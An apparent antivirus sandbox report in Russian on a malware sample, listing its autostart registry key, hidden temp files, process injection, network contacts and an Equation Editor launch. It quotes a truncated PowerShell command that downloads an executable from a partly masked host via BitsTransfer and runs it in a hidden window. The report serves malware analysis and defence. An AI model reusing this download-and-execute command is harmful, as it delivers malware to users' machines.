Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'MyApp' = '%APPDATA%\MyApp\MyApp.exe'
Вредоносные функции
Запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$HSH=$env:temp+'\yYV.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://am##ai.org/admin/_outputAE3F68F.exe' -Destination $HSH;(New-Object -com Shell.Applicat...
Внедряет код в
следующие пользовательские процессы:
- yyv.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\bit2e18.tmp
- %TEMP%\bit47ea.tmp
- %APPDATA%\myapp\myapp.exe
Присваивает атрибут 'скрытый' для следующих файлов
- %TEMP%\bit2e18.tmp
- %TEMP%\bit47ea.tmp
Перемещает следующие файлы
- %TEMP%\bit47ea.tmp в %TEMP%\yyv.exe
- %TEMP%\bit2e18.tmp в %TEMP%\yyv.exe
Сетевая активность
Подключается к
- 'am##ai.org':80
TCP
Запросы HTTP GET
- http://am##ai.org/admin/_outputAE3F68F.exe
UDP
- DNS ASK am##ai.org
Другое
Создает и запускает на исполнение
- '%TEMP%\yyv.exe'
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$HSH=$env:temp+'\yYV.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://am##ai.org/admin/_outputAE3F68F.exe' -Destination $HSH;(New-Object -com Shell.Applicat...' (со скрытым окном)
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
